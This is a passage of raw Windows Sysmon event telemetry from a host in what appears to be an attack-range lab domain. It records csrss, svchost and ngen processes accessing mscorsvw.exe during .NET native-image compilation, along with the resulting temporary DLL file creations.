13:51:12.148{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9250-6005-6304-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:12.148{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9250-6005-6304-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:12.054{59A5CD1D-924E-6005-6204-00000000A301}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13ec-0\System.ServiceModel.Activities.dll2021-01-18 13:51:12.054 10341000x80000000000000008681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:13.960{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9251-6005-6904-00000000A301}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:13.944{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9251-6005-6904-00000000A301}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:13.944{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9251-6005-6904-00000000A301}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:13.882{59A5CD1D-9251-6005-6804-00000000A301}3104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c20-0\System.ServiceModel.Internals.dll2021-01-18 13:51:13.882 10341000x80000000000000008677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:13.523{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9251-6005-6804-00000000A301}3104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:13.507{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9251-6005-6804-00000000A301}3104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:13.507{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9251-6005-6804-00000000A301}3104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:13.460{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9251-6005-6704-00000000A301}3816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:13.460{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9251-6005-6704-00000000A301}3816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:13.460{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9251-6005-6704-00000000A301}3816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:13.366{59A5CD1D-9250-6005-6604-00000000A301}996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\3e4-0\System.ServiceModel.Discovery.dll2021-01-18 13:51:13.366 10341000x80000000000000008698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:14.819{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9252-6005-6E04-00000000A301}4580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:14.804{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9252-6005-6E04-00000000A301}4580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:14.804{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9252-6005-6E04-00000000A301}4580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:14.616{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9252-6005-6D04-00000000A301}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:14.601{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9252-6005-6D04-00000000A301}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:14.601{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9252-6005-6D04-00000000A301}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:14.554{59A5CD1D-9252-6005-6C04-00000000A301}4756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1294-0\System.ServiceModel.ServiceMoniker40.dll2021-01-18 13:51:14.554 10341000x80000000000000008691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:14.491{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9252-6005-6C04-00000000A301}4756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:14.476{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9252-6005-6C04-00000000A301}4756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:14.476{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9252-6005-6C04-00000000A301}4756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:14.429{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9252-6005-6B04-00000000A301}4672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:14.413{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9252-6005-6B04-00000000A301}4672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:14.413{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9252-6005-6B04-00000000A301}4672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.3031